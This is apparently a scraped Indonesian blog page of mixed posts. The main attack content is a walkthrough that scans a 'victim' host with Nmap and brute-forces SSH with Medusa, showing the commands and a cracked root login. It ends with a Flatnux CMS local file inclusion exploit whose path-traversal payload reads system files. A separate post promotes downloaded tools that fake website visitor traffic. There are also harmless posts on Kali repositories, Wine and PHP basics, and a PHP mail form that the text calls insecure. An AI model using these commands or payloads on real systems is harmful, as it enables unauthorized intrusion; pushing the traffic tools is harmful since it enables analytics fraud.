Kebetulan belum ada yang membahas tools Medusa, so. saya coba bahas ya =)

Keterangan:
SSH Atau Secure Shell adalah sebuah protokol jaringan di mana klien dapat bertukar data melalui jaringan yang aman antara dua perangkat sebagai jaringan remote. hal ini banyak digunakan dalam Operasi sistem GNU Linux dan Unix.

Medusa:
medusa adalah alat BruteForce dengan pelayanan yang cepat untuk menampilkan password "SSH,FTP,HTTP,MySQL,Telnet, VNC dan banyak lagi.

Equipments :
1. medusa
2. Nmap

Scan ip yang menjadi target kita menggunakan Nmap

Code:

# nmap -sV xxx.xxx.xxx

-sV : Probe open ports to determine service/version info
xxx.xxx.xxx.xxx : ip-victim

Spoiler! : 

Image exceeds set limits. Click to view full size image

terlihat pada gambar diatas, port 22 service ssh terbuka jadi sangat besar kemungkinan kita dapat melakukan pengeksploitasian =)

selanjutnya kita BruteForce menggunakan Medusa untuk mengetahui username dan password victim:

Code:

# medusa -h xxx.xxx.xxx.xxx -U USER.txt -P PASS.txt -e ns -M ssh -v 4

-h : Target hostname or IP address
-U : File containing usernames
-P : File containing passwords
-e : Additional password checks ([n] No Password, [s] Password = Username)
-M : Name of the module to execute
-v : Verbose level

Spoiler! : 

ACCOUNT FOUND 
Username = root
Password = r00t

sekarang mari kita login 

Code:

# ssh root@xxx.xxx.xxx.xxx

Spoiler! : 

Image exceeds set limits. Click to view full size image

Sukses  

CATATAN: pada dasarnya tidak semudah seperti dalam pengujian yang saya lakukan, bahwa Anda harus mempersiapkan wordlist yang besar serta keberuntungan yang berpihak kepada anda =)

Regards IBT
http://indonesianbacktrack.or.id/forum/thread-5035.html

Read more…

Assalamulaikum warahmatullahi wabarakatuh 
Selamat malam kawan kawan C3MU4 (alay dikit) 
Ketemu lagi sama saya Anak-Bodoh A.K.A Galauer A.K.A H-G404
Pada kesempatan kali ini saya berbagi cara install Microsoft Office 2007 di Kali Linux 
Langsung Ke TKP 
Sebelumnya saya harap anda Naga Sobat udah terinstall Wine 
Kalau belum ada langsung aja pergi ke terminal bus atau labi-labi (di daerah ane) 
ketik 

Quote:leafpad /etc/apt/sources.list

tambahkan repositorynya 
ane gak tau yang mana reponya ane copas aja semua 

Quote:deb http://http.kali.org/ /kali main contrib non-free
deb http://http.kali.org/ /wheezy main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://repo.kali.org/kali kali-bleeding-edge main

Simpan dan lakukan 

Quote:apt-get update
apt-get install wine-bin:i386

kemudian ikuti langkah2 dibawah ini 
1. Install Microsoft Office seperti install di windows dengan membuka file Setup.exe . kemudian masukkan serial number ( jika ada diminta) . pada langkah ini sama seperti install microsoft office di windows 
2.Setelah Proses Install Selesai dan Muncul masalah lagi Microsoft Office Gak bisa di buka , cara mengatasinya sebagai berikut 
=> Aplikasi
=> Perkakas Sistem
=> Wine
=> Configure Wine, klik Applications
Tab, lalu pilih Windows XP/win7 dibawah Windows Version lalu Apply dan OK.

3. kemudian pada tab Libraries di New override for library ketik riched20.dll dan klik Add. Sekarang klik file riched20.dll, klik edit, dan Native (Windows),

Ok Sekian Microsoft Office sudah bisa di Kali Linux anda  

Sekian dari saya Anak-Bodoh AkA Galauer 

Semoga bermanfaat 

Read more…

PHP Mengizinkan kita untuk mengirim email dari script

---

 PHP mail() function di gunakan untuk mengirim pesan/email

Syntax : mail(to,subject,message,headers,parameters)

Parameter	Description
to	Required. Menandakan Penerima
subject	Required. Menandakan Judul Pesan Note: Parameter ini tidak bisa mengandung bari baru atau paragraf
message	Required. Mendefinisikan pesan yang akan di kirim
headers	Optional. Menspesifikan CC / BCC
parameters	Optional. Menspesifikasikan Additional parameter

---

PHP Simple E-Mail

Langkah mudah mengirim email dengan php 
Pertama deklarasikan variable
($to, $subject, $message, $from, $headers), kemudian gunakan function mail() untuk mengirim email :

<?php
$to = "someone@example.com";
$subject = "Test mail";
$message = "Hello! This is a simple email message.";
$from = "someonelse@example.com";
$headers = "From:" . $from;
mail($to,$subject,$message,$headers);
echo "Mail Sent.";
?>

---

PHP Mail Form

Kalau yang di atas kan cara mengirim email dengan cara manual , kalau yang ini dengan mengunakan form :

<html>
<body>
<?php
if (isset($_REQUEST['email']))
//if "email" is filled out, send email
  {
  //send email
  $email = $_REQUEST['email'] ;
  $subject = $_REQUEST['subject'] ;
  $message = $_REQUEST['message'] ;
  mail("someone@example.com", $subject,
  $message, "From:" . $email);
  echo "Thank you for using our mail form";
  }
else
//if "email" is not filled out, display the form
  {
  echo "<form method='post' action='mailform.php'>
  Email: <input name='email' type='text' /><br />
  Subject: <input name='subject' type='text' /><br />
  Message:<br />
  <textarea name='message' rows='15' cols='40'>
  </textarea><br />
  <input type='submit' />
  </form>";
  }
?>
</body>
</html>

Note: This is the simplest way to send e-mail, but it is not secure. In the next chapter of this tutorial you can read more about vulnerabilities in e-mail scripts, and how to validate user input to make it more secure.

---

PHP Mail Reference

For more information about the PHP mail() function, visit our PHP Mail Reference.

Read more…

// Sedikit Penjelasan Tentang PHP foreach loop
$fruitColours 
// didefinisikan sebagai array kemudian gunakan foreach untuk memberikan 
as $colour akan mengambil data dari sesudah tanda => 


<?php
$fruitColours = array(
    "Banana" => "Yellow",
    "Apple"  => "Green",
    "Plum"   => "Purple",
);

foreach ($fruitColours as $colour)
{
    echo "$colour<br/>\n";
}?> 

Nanti Muncul seperti ini :

Yellow
Green
Purple

hanya Value di dalam array yang muncul
kalau ingin mengambil key dan value nya dengan cara berikut

<?php
$fruitColours = array(
    "Banana" => "Yellow",
    "Apple"  => "Green",
    "Plum"   => "Purple",
);
foreach ($fruitColours as $fruit => $colour)
{
    echo "$fruit is $colour<br/>\n";
}?> 

di atas mendefinikan bahwa $fruit sebagai key dan $colour sebagai value
dengan perulangan foreach 

Hasil nya seperti ini : 

Banana is Yellow
Apple is Green
Plum is Purple

Bisa di lihat perbedaan dua kode di atas . menunjukan bahwa foreach bisa di gunakan dengan mendifinisikan value saja atau mendefiinisikan key dan value #CMIIW :)

Read more…

Assalammualaikum, sekedar berbagi dan terus berbagi, saya masih sekitar oprekan repo kali linux serta menguji coba terus kestabilannya, ini ada sedikit ilmu dari saya repository ++, sudah terkait dengan berbagai kebutuhan yang kamu inginkan, tinggal ikutin cara ini :

- Buka terminal linux kesayangan kamu. {Enter}
- Lalu ketikkan di terminal leafpad /etc/apt/source.list {Enter}
- kemudian Copy paste repo ini, ingat jika anda meragu, silahkan backup dulu repo kesayangan anda. Nah silahkan COPAS ini bro :

# Kali linux repository
deb http://http.kali.org/kali kali main contrib non-free
deb-src http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb-src http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali-dev main/debian-installer
deb-src http://http.kali.org/kali kali-dev main contrib non-free
deb http://http.kali.org/kali kali main/debian-installer
deb http://http.kali.org /kali main contrib non-free
deb http://http.kali.org /wheezy main contrib non-free
deb http://repo.kali.org/kali kali-bleeding-edge main
deb http://ftp.debian.org/debian/ sid main contrib non-free
deb http://ftp.debian.org/debian/ wheezy main contrib non-free
deb http://security.debian.org/ wheezy/updates main contrib non-free
deb http://tridex.net/repo/debian/ wheezy main
deb http://backports.debian.org/debian-backports squeeze-backports main

- Kemudian save, lalu jalankan perintah apt-get update --fix-missing && apt-get upgrade -y (ENTER).

Semoga bermanfaat bro.

@Cyberly

Read more…

Kali ini postingan tentang Fake Visitor ini ane juga baru tau ... dapet info dati teman satu team lumayan lah trik ini bisa di pake dan di gunakan sebaik mungkin dari pada harus bloggwalking di blog orang kan cape dan terus promosiin ke orang" di facebook .. mendingan pake aplikasi ini jadi tanpa basa basi ane kasih tutorialnya nih bagi yang mau coba..

Pertama download Alat nya Dulu Di Sini

4shared
Pass : bost-code.blogspot.com
Perlu Net Frame Work minimal v.4 Di SINI

*Net Frame Work Di butuhkan Di program Adminspot.net Backlink Booster Kalau yang lain tidak menggunakan Net Frame Work

Pertama Buka Jigling.exe
Masukan Url Blog anda Yang menuju ke index maupun ke postingan Dan Klik Tombol

Buka AdminSpotNet .. Masukan Url blog Anda Dan klik Boost!

Buka AlexaBooster 3.4 Masukan Url Anda ke "Url to Send To" Klik Add
Ke Step 2 Klik Default Proxy
Ke Step 3 Klik Start

hasilnya

Read more…

##########################################
[~] Exploit Title: Flatnux CMS Local File Inclusion
[~] Date: 21-03-2013 
[~] Author: DaOne aka Mocking Bird 
[~] Vendor Homepage: http://flatnux.altervista.org/ 
[~] Software Link: http://flatnux.altervista.org/download.html?f=Flatnux-Next/flatnux-2013-01.17.zip 
[~] Category: webapps/php 
[~] Version: 2013-01.17 
[~] Tested on: Apache/2.2.8(Win32) PHP/5.2.6 
##########################################
# Exploit 
index.php?theme={localfile}{nullbyte} http://localhost/flatnux/index.php?theme=../../../../../../../../../../windows/win.ini 
# References
http://www.exploit-id.com/web-applications/flatnux-cms-local-file-inclusion#sthash.HwM1yoOk.dpuf

Read more…